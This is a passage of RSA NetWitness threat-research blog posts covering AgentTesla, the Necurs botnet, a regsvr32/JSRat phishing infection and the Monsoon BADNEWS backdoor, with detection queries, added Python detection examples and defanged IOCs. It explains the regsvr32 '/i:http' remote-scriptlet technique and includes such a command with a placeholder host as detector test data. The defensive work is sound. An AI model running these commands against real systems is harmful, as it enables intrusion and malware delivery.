An RSA NetWitness Endpoint (aka ECAT) agent installed on the affected client machine shows the following tracking information and machine Indicators of Compromise (IOCs).




After the victim is infected, AgentTesla begins outbound communications via HTTP POSTs to onlinesypoi[.]com. Highlighted fields below represent a possible signature for Agent Tesla spyware [3].




The domain onlinesypoi[.]com itself was also observed delivering AgentTesla binaries.






Scan results for those binaries can be found here and here.


All the IOC from those HTTP sessions were added to RSA FirstWatch Command and Control Domains on Live with the following meta:

  • threat.source = ‘rsa-firstwatch’
  • threat.category = ‘malspam’
  • threat.description = ‘delivery-domain’


Thanks to Kevin Stear and Prakhar Pandey for contributing to this threat advisory.



  3. In-Depth Analysis of A New Variant of .NET Malware AgentTesla - Fortinet Blog
Necurs Delivers

Posted by Robert Conley (RSA Employee), Jul 13, 2017

The shotgun effect

Botnets are the shotgun within a cybercriminal's arsenal.  They provide an amplified delivery mechanism for malware and other threats.  Deployment varies, but they are typically installed on an unsuspecting victim's system through the use of an exploit kit (EK).  They compromise a known system vulnerability to allow unauthorized access.  After taking control of a large group of systems, commonly referred to as zombies, a ‘botmaster’ will use them to conduct nefarious activities, like sending spam.


Some botnets are reported to have over one million zombies.  That’s a lot of spam blasted across the internet, and perhaps what Necurs is best known for.


This article discusses the Necurs botnet and its architecture, highlights recent, notable payloads, and shows how RSA NetWitness products can identify it.




Necurs is one of the largest botnets; some claim it is the largest.  Reports have it containing upwards of six million endpoints [1].  It was identified in 2012 and remains active on the threat landscape.  Its activity has seen periodic ebbs, but Blackhats continue using it.  With regard to payloads, Necurs has been responsible for delivering many high-profile malware campaigns including Dridex, Locky, and Jaff.  It has also been used to transmit a slew of other spam and phishing attacks.  Security researchers recently observed that a new module was added to carry out distributed denial of service (DDoS) attacks [2].


Necurs is a highly resilient piece of malware.  Its strength and longevity can be attributed to many factors including a kernel-mode rootkit [8], modularity, anti-AV features, and domain generation algorithms [8].  Additionally, it contains a hybrid network architecture which leverages two different Command and Control (C2) models.


The first model uses centralized C2 servers and a flat hierarchy for managing and organizing a legion of zombies.  Although effective, it is also a weakness because it offers a central point of failure.  If law enforcement or other appropriate parties can disable or even blacklist a couple of servers, they will have impacted the botnet.


To mitigate this weakness, Necurs uses a second model which has built-in peer-to-peer communications to provide C2 server redundancy [3].  Conceptually, it constitutes a meshed network wherein every node, servers and clients alike, talks to the others.  If one server becomes inaccessible, the others will not only detect it, they will initiate operations to promote another to replace it.  In so doing, they regain control of any orphaned zombies.


Detecting Necurs, or any botnet for that matter, is challenging because of its custodial role as a transport vehicle for other malware.  Its presence is discreet and often discovered only after the transported malware has been exposed.  With this in mind, we’re going to discuss detection first as it pertains to transported malware, and then as it pertains to Necurs itself.




  • Jaff Ransomware

In May 2017 the Jaff ransomware was being delivered globally via a large, malicious spam campaign.  Researchers determined that its source was the Necurs botnet [4].  The malspam contains a PDF attachment.  Opening it shows one line of text, Figure 1.

Figure 1



A user is then prompted to open the embedded Word document, Figure 2.

Figure 2



Embedded JavaScript macros open the Word doc, which then downloads and executes an encrypted binary, the Jaff ransomware loader.  Analyzing the Word file on produces a high threat score, Figure 3.

Figure 3



Figure 4 shows a Jaff Request/Response event using NetWitness for Logs and Packets.

Figure 4



The event’s meta, shown in Figure 5, is then reviewed to understand why the session was flagged.  In this instance, both host name and header count are strong indicators of suspicious activity.

Figure 5



After a victim's files are encrypted a ransom note file is dropped.  In it are instructions to visit a payment portal site.  Once there, a user can make a bitcoin payment in order to decrypt their files.


Kaspersky Lab provides a free decrypter utility for Jaff ransomware.  Their RakhniDecryptor application, version, can unlock files having either .jaff, .wlu, or .svn extensions [5].




  • Locky ransomware

First seen in 2016, Locky ransomware was sent via a Necurs spam campaign to millions of unsuspecting victims [7].  Each email contained an attached Microsoft Word document laden with malicious macros.  The macro is engineered to execute when the document is opened by the user, and it then downloads the loader.


A sample of Locky network traffic, seen in Figure 6, shows network communications direct to an IP address as opposed to a host name.

Figure 6



Figure 7 shows that the request contains a POST command instead of the typical GET.  The infected host could either be transmitting data back to the downloader site or grabbing executables.

Figure 7



A close inspection of the streams confirms files are being sent, Figure 8.

Figure 8



Locky and Jaff share some common characteristics.  For example, they’re both ransomware, delivered via Necurs, and have similar payment pages.  Is it possible Jaff is a newer version of Locky?  This doesn’t appear to be the case based on analysis conducted by RSA’s Data Science team.  The scientists applied fuzzy hashing techniques to executable code fragments and import libraries of each malware.  Their findings indicated a low degree of confidence that there’s a shared code base between the two.



  • Trickbot Banking Trojan

In early June 2017 security researchers identified an email campaign delivering the Trickbot banking trojan.  Closer examination of the infection chain revealed that it was identical to that used for the delivery of Jaff ransomware.  This led them to conclude that the Necurs botnet was the delivery mechanism [6].  Trickbot first appeared in late 2016 and targeted banks in the UK and Australia.  The current campaign has expanded its targets.  Now included are France, Sweden, Norway, Finland, and Denmark.


Viewing Trickbot network traffic using RSA NetWitness Logs and Packets reveals the following about the malware.  It sends HTTP traffic over a non-standard port, Figure 9.

Figure 9



A closer examination of the sessions reveals HTTP traffic is being sent over port 443, instead of the standard port 80.  The destination is, Figure 10.

Figure 10



The session’s details present an exchange wherein a GET command retrieves an obfuscated cookie, Figure 11, which will be injected into a user’s browser.  The server responds with a 404 Not Found page.  This is a diversion, used to distract the victim while the infection process executes.

Figure 11



Existing reports confirm the cookie is associated with the Trickbot Trojan.  Figure 12 shows one from  Also seen is the IP address/port combination that was already identified.

Figure 12
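The three cases above each surface in session meta as a simple property: Jaff's sessions stood out on host name and header count, Locky talked to a bare IP address with POST requests, and Trickbot sent HTTP over port 443. The Python block below is an added example, not RSA's code and not NetWitness's own rule syntax; it scores constructed session records against those heuristics so the oddest sessions sort to the top of a hunt. The session fields, the RFC 5737 test addresses, the host names and the header-count threshold are assumptions.

```python
"""Static triage of HTTP session meta.

Added example, not RSA's code. SESSIONS is a CONSTRUCTED sample modelled on
the Locky, Trickbot and Jaff traffic described in the post.
"""
import ipaddress
from typing import Dict, List

SESSIONS: List[Dict] = [
    {"id": 1, "dst_ip": "198.51.100.7", "dst_port": 80, "service": "HTTP",
     "host": "198.51.100.7", "method": "POST", "header_count": 3, "uri": "/upload/"},      # Locky-like
    {"id": 2, "dst_ip": "203.0.113.9", "dst_port": 443, "service": "HTTP",
     "host": "203.0.113.9", "method": "GET", "header_count": 4, "uri": "/response.php"},   # Trickbot-like
    {"id": 3, "dst_ip": "192.0.2.44", "dst_port": 80, "service": "HTTP",
     "host": "cdn.example.net", "method": "GET", "header_count": 9, "uri": "/a.js"},       # ordinary
    {"id": 4, "dst_ip": "192.0.2.55", "dst_port": 80, "service": "HTTP",
     "host": "xyz-upd.example", "method": "GET", "header_count": 2, "uri": "/af/8g3k.exe"},  # Jaff-like
]

STANDARD_HTTP_PORTS = {80, 8080}
LOW_HEADER_COUNT = 3            # threshold is an assumption for the example; tune per environment


def is_ip_literal(host: str) -> bool:
    """True when the Host header carries an address instead of a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def triage(session: Dict) -> Dict:
    """Collect the reasons a session looks odd; the score is simply how many fired."""
    reasons: List[str] = []
    if session["service"] == "HTTP" and session["dst_port"] not in STANDARD_HTTP_PORTS:
        reasons.append("http-on-non-standard-port")            # Trickbot: HTTP over 443
    if is_ip_literal(session["host"]):
        reasons.append("host-header-is-ip-literal")            # Locky: direct to IP
        if session["method"] == "POST":
            reasons.append("post-direct-to-ip")                # Locky: data going out
    if session["header_count"] <= LOW_HEADER_COUNT:
        reasons.append("low-header-count")                     # Jaff: sparse request
    return {"id": session["id"], "score": len(reasons), "reasons": reasons}


def triage_all(sessions: List[Dict]) -> List[Dict]:
    """Highest-scoring sessions first; ties keep input order."""
    return sorted((triage(s) for s in sessions), key=lambda r: -r["score"])


if __name__ == "__main__":
    for row in triage_all(SESSIONS):
        print(row)
```

The ordinary CDN fetch scores zero while the three malware-like sessions rank 3, 2 and 1; in practice each reason would be one meta key or app rule, and the score is only a sort order for the analyst, not a verdict.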





  • Pump and dump spam

In early 2017 a significant upswing in pump and dump spam traffic was observed by the security industry.  The campaigns claimed to provide insider tips and information on supposedly ‘hot’ stocks.  In reality, they were merely a social engineering ploy to entice recipients to buy now and then enjoy a handsome return on their investment at a later date [8].  This type of scam isn’t new.  As in the past, the goal is to pump up a stock’s price.  After this happens, the perpetrators sell their shares and pocket a nice profit.  Close examination of email header configurations and recipient lists revealed strong similarities to previous Necurs-based campaigns.


Figure 13 shows an email which targeted InCapta Inc (INCT). 

Figure 13, source



The stock’s price spiked during the spam run, Figure 14.

Figure 14, source



Unwanted emails of this nature can easily be filtered at the email server level.  In addition, using a messaging authentication protocol is another means of blocking unsolicited emails.  The Domain-based Message Authentication, Reporting & Conformance (DMARC) protocol is one example.



  • Detecting Necurs

RSA NetWitness products can alert on and detect botnet activity in many different ways.  To illustrate, here’s a brief hunting exercise on Necurs malware in a controlled environment.  To facilitate it a few preliminary steps were taken.  They included detonating known Necurs malcode in a sandbox and pre-populating indicators of compromise (IOCs) into an RSA Live feed.  Clearly, these steps improved detection results. However, their primary purpose was to improve the clarity and logical flow of this hunting exercise as well as to demonstrate botnet activity.


To begin hunting I used NetWitness Security Analytics and loaded the RSA Threat Analysis profile.  I focused on the meta labelled c2-domain, c2-ip, hostname aliases, and beaconing, all of which represent botnet behavior.  Beaconing is when zombies send small messages, often over either Transmission Control Protocol (TCP) or Hypertext Transfer Protocol (HTTP), to C2 servers at predetermined intervals.  They’re used to exchange updates, get instructions, and issue keep-alive heartbeats.
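The beaconing meta described above rests on the timing property just stated: small messages to the same server at predetermined intervals. The Python block below is an added example, not RSA's code and not how NetWitness computes its beaconing meta; it groups a constructed connection log by source/destination pair and reports pairs whose inter-arrival gaps are nearly constant (low coefficient of variation) and whose payloads stay small. The log format, the addresses, the 300-second timer and the thresholds are assumptions.

```python
"""Beaconing detection from connection logs by interval regularity.

Added example (not RSA's code). CONN_LOG is CONSTRUCTED: one host contacts a
server every ~300 s with small payloads, another host browses irregularly.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

CONN_LOG = """\
2017-07-10T10:00:00 10.0.0.5 203.0.113.9:443 312
2017-07-10T10:00:05 10.0.0.8 198.51.100.20:80 5120
2017-07-10T10:00:10 10.0.0.8 198.51.100.20:80 48000
2017-07-10T10:01:10 10.0.0.8 198.51.100.20:80 900
2017-07-10T10:01:17 10.0.0.8 198.51.100.20:80 20000
2017-07-10T10:05:01 10.0.0.5 203.0.113.9:443 308
2017-07-10T10:07:57 10.0.0.8 198.51.100.20:80 3300
2017-07-10T10:07:58 10.0.0.8 198.51.100.20:80 1500
2017-07-10T10:10:00 10.0.0.5 203.0.113.9:443 310
2017-07-10T10:15:00 10.0.0.5 203.0.113.9:443 309
2017-07-10T10:20:02 10.0.0.5 203.0.113.9:443 311
2017-07-10T10:25:00 10.0.0.5 203.0.113.9:443 307
"""

Pair = Tuple[str, str]
Event = Tuple[datetime, int]


def parse_connections(log: str) -> Dict[Pair, List[Event]]:
    """Group (timestamp, bytes) by (src, dst:port); lines are 'ts src dst:port bytes'."""
    conns: Dict[Pair, List[Event]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, dst, size = line.split()
        conns[(src, dst)].append((datetime.fromisoformat(ts), int(size)))
    for pair in conns:
        conns[pair].sort()          # order by time before taking gaps
    return dict(conns)


def beacon_candidates(conns: Dict[Pair, List[Event]], min_events: int = 5,
                      max_cv: float = 0.10, max_bytes: int = 1024) -> List[Dict]:
    """Pairs with many small, evenly spaced connections.

    CV = stdev/mean of the inter-arrival gaps; near zero means a fixed timer.
    Thresholds are assumptions for the example; tune them on real traffic, and
    expect jittered implants to need a looser max_cv.
    """
    out = []
    for (src, dst), events in conns.items():
        if len(events) < min_events:
            continue
        if max(size for _, size in events) > max_bytes:
            continue                # bulk transfers are not heartbeats
        gaps = [(later[0] - earlier[0]).total_seconds()
                for earlier, later in zip(events, events[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            out.append({"src": src, "dst": dst, "events": len(events),
                        "mean_interval_s": round(avg, 1), "cv": round(cv, 4)})
    return out


if __name__ == "__main__":
    for hit in beacon_candidates(parse_connections(CONN_LOG)):
        print(hit)
```

On the sample only 10.0.0.5 → 203.0.113.9:443 is reported, with a 300-second mean interval and a CV under 0.01; the browsing host fails both the size and the regularity tests. Real logs need a time window (beacons are regular within a session, not across reboots) and an allow-list for legitimate pollers such as update checkers.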


Figure 15 shows captured network traffic.  Necurs IOCs appear in the c2-domain and c2-ip meta.

Figure 15


Hostname-aliases is a subset of the c2-domain category., circled in red in Figure 16, has been flagged.  It warrants closer scrutiny.

Figure 16



Cross referencing it on reveals malicious activity, see Figure 17.

Figure 17



Performing a double check on the domain’s reputation, using a site like, is a good next step.  The results, see Figure 18, support the findings in the previous step.  Its integrity is questionable.

Figure 18



Returning to the Security Analytics interface, I proceeded to drill down on in order to identify destination IP addresses.  I chose one to check,, shown in Figure 19.

Figure 19



Searching this IP address on confirms malicious network traffic has been detected, Figure 20.

Figure 20


Returning to Security Analytics, I next investigated TCP beaconing meta, Figure 21.  It, too, confirmed Necurs activity.

Figure 21




Necurs is a massive botnet, possibly the largest in the world.  Its architecture has received periodic updates which have contributed to its versatility and longevity.  It has a track record of effectively using spam email to deliver ransomware, banking trojans, and many other malicious payloads.  Threat actors use Necurs’ wide reach to quickly saturate targeted markets with their campaigns, thereby increasing its potential infection rate.  


Thanks to Steven Sipes, Kevin Stear, Ray Carney, Ahmed Sonbol, and Lisa Bayen for their contributions to this blog post.




Necurs IOCs added to the RSA C2-IP and C2-Domain feeds


Additional reading

Recently, I was using NetWitness Endpoint (ECAT) to help triage a large environment.  During this time, I identified a few systems that were exploited by a malicious HTML file.  It was part of a phishing campaign that came in via email.  Unfortunately, I was unable to find the file because it was no longer in the Outlook Temporary Internet Files folder.  However, since we have tracking data coming in from the agents, I was able to recreate the scene even without the initial malicious code.


The original compromise showed tracking data like the one below:



Here we can see that Outlook starts up Chrome to open a file in the Outlook Temporary Internet Files directory.  From there we see regsvr32.exe kicked off with a URL in its launch arguments.  regsvr32.exe is a legitimate, signed Microsoft file used to register DLLs and other controls in the Windows Registry.  Last year, researcher Casey Smith described how this component could take a URL to a remote file as an argument to bypass various security controls.  The URL could be over HTTP or HTTPS and would point to an SCT file.  This SCT file is really just an XML file with instructions on what regsvr32.exe should do.


With the tracking data showing us step by step what occurred on the system, we can use these commands on a different system and attempt to recreate the infection.  


On my analysis system, I opened a command prompt and ran that started this off.  


This URL took us to the malicious script on a Google API site over SSL.  The contents of that SCT file can be seen below:



In there we see the syntax the JSRat is going to execute, leveraging mshta as well as another URL.  This new 'terra' URL sends another XML scriptlet to download and install a malicious DLL called 'rubyonrais.dll'.




Tracking data in our analysis system looks very similar to what our original host showed along with the registering of the DLL.



If we take a look at the network traffic associated with this, we can get insight into what was happening as well.  



We can see the request to '' over SSL and then the connection to 'meubackup.terra[.]com[.]br'.  This downloaded a 1.4 MB file based on the network traffic.  Even though this is an SSL connection, we can still see the metadata about that session.  I can now go and find the file where the script told us it would be, in the C:\Users\Public\Administrator folder.



Currently this could be picked up with the IIOC "Runs mshta with javascript arguments".


Another IIOC we could create is slightly different from the out-of-the-box one, covering both HTTP and HTTPS connections.



--Runs_REGSVR32_HTTP.sql Runs REGSVR32.EXE with HTTP argument

/* DB Query (ad-hoc query against the tracking-event tables; returns the machine, time, source module and launch arguments for triage)

SELECT mn.MachineName, se.EventUTCTime, sfn.Filename, se.FileName_Target, se.Path_Target, se.LaunchArguments_Target, sla.LaunchArguments
FROM [dbo].[WinTrackingEvents_P0] AS [se] WITH(NOLOCK) -- Also try P1
INNER JOIN [dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON ([mp].[PK_MachineModulePaths] = [se].[FK_MachineModulePaths])
INNER JOIN [dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] = [mp].[FK_FileNames])
INNER JOIN [dbo].[machines] AS [mn] WITH(NOLOCK) ON [mn].[PK_Machines] = [se].[FK_Machines]
INNER JOIN [dbo].[LaunchArguments] AS [sla] WITH(NOLOCK) ON [sla].[PK_LaunchArguments] = [se].[FK_LaunchArguments__SourceCommandLine]
WHERE
[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'   -- matches both http:// and https:// scriptlet URLs
--ORDER BY se.EventUTCTime desc
ORDER BY mn.MachineName desc
*/

-- IIOC query (runs against the tracking-event cache). The SELECT list below was lost in extraction
-- and is reconstructed from the FK_Machines column used in the join above (assumption).
SELECT DISTINCT [se].[FK_Machines]
--,[se].[PK_WinTrackingEvents] AS [FK_mocSentinelEvents]

-- If you are using, remove the comment dash above

FROM [dbo].[WinTrackingEventsCache] AS [se] WITH(NOLOCK)
WHERE
[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'





I hope you find this useful and as always, happy hunting.



On July 6, 2017, RSA FirstWatch noted renewed MONSOON APT campaign activity submitted (from a community user in India) to Virus Total.  The submission in this case was an email attachment, Free_Hosting.doc, a Rich Text Format (RTF) document that attempts to exploit CVE-2015-1641. (Note: For a technical walk-through of RTF and its commonly exploited vulnerabilities, we recommend readers take a look at this post by RSA Engineering's Kevin Douglas.)


monsoon badnews rtf


The RTF file drops BADNEWS, a backdoor facilitated by a signed Java executable that uses a DLL side-loading technique to evade security detection/prevention.  (A similar technique is employed by PlugX, a backdoor that is well documented by past RSA Research efforts.)  To accomplish this, the RTF writes out several executables, which create MicroScMgmt.exe and jli.dll in C:\Users\analyst\AppData\Roaming\Microsoft and modify the current user's RUN key to add persistence.


monsoon badnews exe


monsoon badnews exe


The executable also reaches out to 'GET /images/' from www.samanthvisser[.]com, hosted at 162[.]255[.]116[.]10 to retrieve a decoy Free_Hosting.doc to distract users.


monsoon badnews rtf

monsoon RTF exploit


Meanwhile, MicroScMgmt.exe (md5: BA79F3D12D455284011F114E3452A163) is actually a signed copy of Java Platform SE 6 U39 that side loads (essentially calling an execution path for) jli.dll from C:\Users\analyst\AppData\Roaming\Microsoft in the place of Microsoft's msvcr71.dll from the Windows\System32 folder.  Backdoor established.


monsoon badnews exe

monsoon badnews exe


Based on these observations, this activity from early July appears consistent with recent Monsoon campaigns as documented by both Fortinet (part1 and part2) and Forcepoint.  Nice screen shot courtesy of Vitali Kremez, @VK_Intel, who captured our executable in action.


monsoon badnews exe


Upon infection, initial Command and Control (C2) was observed via an unsolicited 'HTTP POST /6031170831643635.xml' out to feed43[.]com, a domain previously tied to Monsoon (part1 of the Fortinet reports 'hxxp://') and believed to host encrypted data that contains the actual C2 server. 


monsoon badnews c2


We also observed suspected outbound C2 via 'HTTP POST /1bc29b36f623ba82aaf672/435dfa34fasdf3.php' out direct to IP address 91[.]92[.]136[.]20, likely also passing encrypted (or obfuscated) content.  We also noted outbound communications to en[.]wikipedia[.]org, but the purpose of this connection remains unclear (although it possibly relates to past actor usage of forums).


monsoon badnews c2


With regard to NetWitness detection of Monsoon APT's delivery of BADNEWS, note the behavioral indicators captured in the meta below.


netwitness monsoon apt badnews

netwitness monsoon apt badnews

netwitness monsoon apt badnews


NetWitness Endpoint (i.e., ECAT) was also able to identify this activity rather easily by monitoring Office applications, WINWORD in the case of BADNEWS, for writing any executables.  Indicators of compromise (IOCs) from ECAT are below.


ecat monsoon badnews iocs
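The regsvr32 scriptlet post earlier on this page and this BADNEWS write-up come down to the same class of endpoint check: a rule evaluated over process-create, file-write and module-load tracking events. The Python block below is an added example, not RSA's code and not ECAT's IIOC query language; it expresses four such rules over a constructed list of events: the regsvr32 /i:http(s) and mshta-with-javascript checks from the earlier post, and the "Office application writes an executable" and "signed binary loads a DLL from the user profile" checks from this one. The event dictionaries, the HOST names, the placeholder URL https://example.invalid/file.sct, the extension-based executable check and the rule names are assumptions; the paths and file names reuse values quoted in the two posts.

```python
"""IIOC-style rules over endpoint tracking events.

Added example (not RSA's code). SAMPLE_EVENTS is a CONSTRUCTED stand-in for
tracking data; paths and names reuse values quoted in the posts, the scriptlet
URL is a placeholder.
"""
import re
from typing import Callable, Dict, List, Optional

EXECUTABLE_EXT = (".exe", ".dll", ".scr")      # extension check is an assumption; ECAT inspects content
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPTLET_URL = re.compile(r"/i:(https?://\S+)", re.IGNORECASE)   # same idea as LIKE '%/i:http%'
USER_PROFILE = re.compile(r"^c:\\users\\", re.IGNORECASE)

SAMPLE_EVENTS: List[Dict] = [
    # regsvr32 post: regsvr32.exe handed a remote scriptlet over HTTPS
    {"type": "process_create", "machine": "HOST1", "source": "chrome.exe",
     "target": "regsvr32.exe", "args": "regsvr32.exe /i:https://example.invalid/file.sct"},
    # regsvr32 post: mshta launched with inline javascript
    {"type": "process_create", "machine": "HOST1", "source": "regsvr32.exe",
     "target": "mshta.exe", "args": "mshta.exe javascript:close()"},
    # BADNEWS post: WINWORD writes an executable under the user's profile
    {"type": "file_write", "machine": "HOST2", "source": "winword.exe",
     "path": "C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\MicroScMgmt.exe"},
    # BADNEWS post: signed Java binary loads jli.dll from that same directory
    {"type": "module_load", "machine": "HOST2", "source": "MicroScMgmt.exe", "source_signed": True,
     "path": "C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\jli.dll"},
    # benign: the same binary loading a system DLL
    {"type": "module_load", "machine": "HOST2", "source": "MicroScMgmt.exe", "source_signed": True,
     "path": "C:\\Windows\\System32\\msvcr71.dll"},
    # benign: local DLL registration and an ordinary document save
    {"type": "process_create", "machine": "HOST3", "source": "explorer.exe",
     "target": "regsvr32.exe", "args": "regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll"},
    {"type": "file_write", "machine": "HOST3", "source": "winword.exe",
     "path": "C:\\Users\\analyst\\Documents\\report.docx"},
]

Rule = Callable[[Dict], Optional[Dict]]


def rule_regsvr32_remote_scriptlet(ev: Dict) -> Optional[Dict]:
    if ev["type"] == "process_create" and ev["target"].lower() == "regsvr32.exe":
        m = SCRIPTLET_URL.search(ev["args"])
        if m:
            url = m.group(1)
            return {"rule": "regsvr32_remote_scriptlet", "machine": ev["machine"],
                    "url": url, "scheme": url.split(":", 1)[0].lower()}
    return None


def rule_mshta_javascript(ev: Dict) -> Optional[Dict]:
    if (ev["type"] == "process_create" and ev["target"].lower() == "mshta.exe"
            and "javascript:" in ev["args"].lower()):
        return {"rule": "mshta_javascript", "machine": ev["machine"], "parent": ev["source"]}
    return None


def rule_office_writes_executable(ev: Dict) -> Optional[Dict]:
    if (ev["type"] == "file_write" and ev["source"].lower() in OFFICE
            and ev["path"].lower().endswith(EXECUTABLE_EXT)):
        return {"rule": "office_writes_executable", "machine": ev["machine"], "path": ev["path"]}
    return None


def rule_signed_process_loads_profile_dll(ev: Dict) -> Optional[Dict]:
    """Side-loading heuristic: a signed process pulls a DLL from a user-writable profile path."""
    if (ev["type"] == "module_load" and ev.get("source_signed")
            and USER_PROFILE.match(ev["path"]) and ev["path"].lower().endswith(".dll")):
        return {"rule": "signed_process_loads_user_profile_dll", "machine": ev["machine"],
                "process": ev["source"], "dll": ev["path"]}
    return None


RULES: List[Rule] = [rule_regsvr32_remote_scriptlet, rule_mshta_javascript,
                     rule_office_writes_executable, rule_signed_process_loads_profile_dll]


def run_rules(events: List[Dict]) -> List[Dict]:
    """Evaluate every rule against every event; one finding per (event, rule) hit."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f)
```

The four malicious events each produce one finding and the three benign ones none; the scriptlet rule also returns the URL and its scheme, which is the value an analyst pivots on in packet data (the earlier post's point about covering both HTTP and HTTPS). The side-loading rule is deliberately broad, since a signed binary loading from a profile directory is unusual but not impossible for user-installed software; it is a hunting lead rather than an alert on its own.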


Additionally, all observed MONSOON BADNEWS domains and IPs have been added to the FirstWatch C2 Domains and IPs feeds and should be available via RSA Live.


Thanks to Christopher Ahearn and Ahmed Sonbol for their help with this analysis.




The RSA NetWitness Log Parsing team has reviewed the Top 50 Log Parsers that generate the largest number of incoming “Unknown Message Defect” support cases.


Summary for Top 50 Event Sources

  Category                                        # of Log Parsers Released on Live
  Number of Event Sources - IMPROVED & RELEASED   38 (as of 21 Jun 2017)
  Number of Event Sources - CANNOT BE IMPROVED    Not Applicable
  Final Count


These enhancements are part of a strategic initiative to drive improvements to Log Parsers.

Benefits from these improvements result in:

  • Fewer Unknown Messages
  • Improved Device Discovery
  • Better Adaptability to newer versions of an Event Source
  • Reduced Parser Maintenance


To take advantage of these improvements, you will need to download the latest versions of the Log Parsers listed below from the NetWitness Live Portal.



A Look into the Details

50 Log Parsers were identified as the ones causing almost 80% of ALL incoming requests for fixing unknown messages and minor defects. All of them were reviewed in detail and checked for the scope of possible improvements.


Design Considerations

The team investigated the reasons behind the generation of a high volume of incoming unknown message tickets.


The factors considered were:

  • Common patterns seen across all unknown message tickets for a particular event source.
  • Certain Log formats that generate Unknown messages
  • Were these logs result of a Configuration Error?
  • Were these logs generated after upgrading to a newer version of the Event Source?
  • Backwards Compatibility Impact of the modifications:
    • If the solution re-designs the parser in any way (re-writing a few or all message definitions or header definitions), the 'after-effect' on the Meta Key Footprint should be none to very minimal.


Log Parsers were updated or re-designed only if the Backwards Compatibility impact from the above parameters was negligible.

Here is a brief highlight of the design improvements:


  • The Log Parsers have been redesigned to identify all events generated by the event source. They have been made future proof as much as possible to parse newer events.
  • Log Parsers which parse logs with structured formats that use tag=value functionality, have been updated to accommodate New/Unknown tags, which significantly reduces the number of unknown messages.
  • These updates were also done to cover as many new changes as possible that may be introduced in Newer versions of the product.
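The second improvement above, accommodating new or unknown tags in tag=value formats, is the one that can be shown in code. The Python block below is an added example, not the NetWitness parser engine or any of the Log Parsers listed on this page: it parses constructed tag=value log lines, maps the tags it knows onto meta keys, and keeps tags it has never seen instead of failing the whole message, so a newer event-source version does not turn into a pile of "unknown messages". The tag-to-meta map, the sample lines and the record format are assumptions.

```python
"""Tolerant tag=value log parser.

Added example, not the NetWitness parser engine. Known tags map to meta keys;
unknown tags are kept rather than failing the message. Sample lines and the
tag map are CONSTRUCTED.
"""
import re
from collections import Counter
from typing import Dict, List

KNOWN_TAGS: Dict[str, str] = {
    "src": "ip.src", "dst": "ip.dst", "spt": "port.src", "dpt": "port.dst",
    "act": "action", "user": "user.src",
}

# tag=value where value is either a double-quoted string (with \" escapes) or a bare token
TOKEN = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

SAMPLE_LOGS: List[str] = [
    'Jul 13 2017 10:01:02 fw1 src=10.1.1.1 dst=192.0.2.5 spt=51000 dpt=443 act=allow user=alice',
    # a "newer version" of the event source adds tags the parser has never seen
    'Jul 13 2017 10:01:03 fw1 src=10.1.1.2 dst=192.0.2.6 spt=51001 dpt=80 act=deny proto=tcp sessid=88213 user=bob',
    # quoted values with spaces and escaped quotes
    'Jul 13 2017 10:01:04 fw1 src=10.1.1.3 dst=192.0.2.7 act="Deny inbound" msg="rule \\"default\\" hit" user=carol',
]


def _unquote(value: str) -> str:
    if len(value) >= 2 and value[0] == value[-1] == '"':
        return value[1:-1].replace('\\"', '"')
    return value


def parse_line(line: str) -> Dict:
    """Split a line into its free-text header, mapped meta and unmapped tags."""
    matches = list(TOKEN.finditer(line))
    if not matches:
        raise ValueError("no tag=value pairs: " + line)
    header = line[:matches[0].start()].strip()
    meta: Dict[str, str] = {}
    unknown: Dict[str, str] = {}
    for m in matches:
        tag, value = m.group(1), _unquote(m.group(2))
        if tag in KNOWN_TAGS:
            meta[KNOWN_TAGS[tag]] = value
        else:
            unknown[tag] = value        # kept, not dropped, and not a parse failure
    return {"header": header, "meta": meta, "unknown": unknown}


def parse_batch(lines: List[str]) -> List[Dict]:
    return [parse_line(line) for line in lines]


def unknown_tag_report(lines: List[str]) -> Counter:
    """Which unknown tags occur and how often: the shortlist for the next parser update."""
    report: Counter = Counter()
    for rec in parse_batch(lines):
        report.update(rec["unknown"].keys())
    return report


if __name__ == "__main__":
    for rec in parse_batch(SAMPLE_LOGS):
        print(rec)
    print(unknown_tag_report(SAMPLE_LOGS))
```

All three lines parse; the second and third carry unknown tags (proto, sessid, msg) that a strict per-message definition would have rejected, and the report function turns those leftovers into the list of tags worth mapping in the next parser release.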


Here is the list of 38 Log Parsers that were improved and released to NetWitness Live:

  • Bit9-Bit9 Security Platform
  • Blue Coat-Blue Coat ProxySG SGOS
  • Check Point-Check Point Security Suite, IPS-1
  • Cisco-Cisco Adaptive Security Appliance
  • Cisco-Cisco IronPort Email Security Appliance
  • Cisco-Cisco IronPort Web Security Appliance (WSA)
  • Cisco-Cisco Secure Access Control Server & Cisco-Cisco Identity Services Engine
  • Cisco-Cisco Secure IDS or IPS
  • Cisco-Cisco Wireless LAN Controller (2100 Series and 4400 Series)
  • F5-F5 Big-IP Application Security Manager
  • FireEye-FireEye Web Malware Protection System
  • Fortinet-Fortinet FortiGate
  • IBM-IBM DB2 Universal Database
  • IBM-IBM iSeries AS400
  • IBM-IBM ISS SiteProtector
  • IBM-IBM WebSphere
  • Juniper-Juniper Networks SSL VPN
  • Lancope-Lancope StealthWatch
  • McAfee-McAfee Email Gateway (formerly known as CipherTrust IronMail)
  • McAfee-McAfee Network Security Platform (Intrushield)
  • Microsoft-Microsoft Exchange Server
  • Microsoft-Microsoft Internet Information Services
  • Microsoft-Microsoft SQL Server
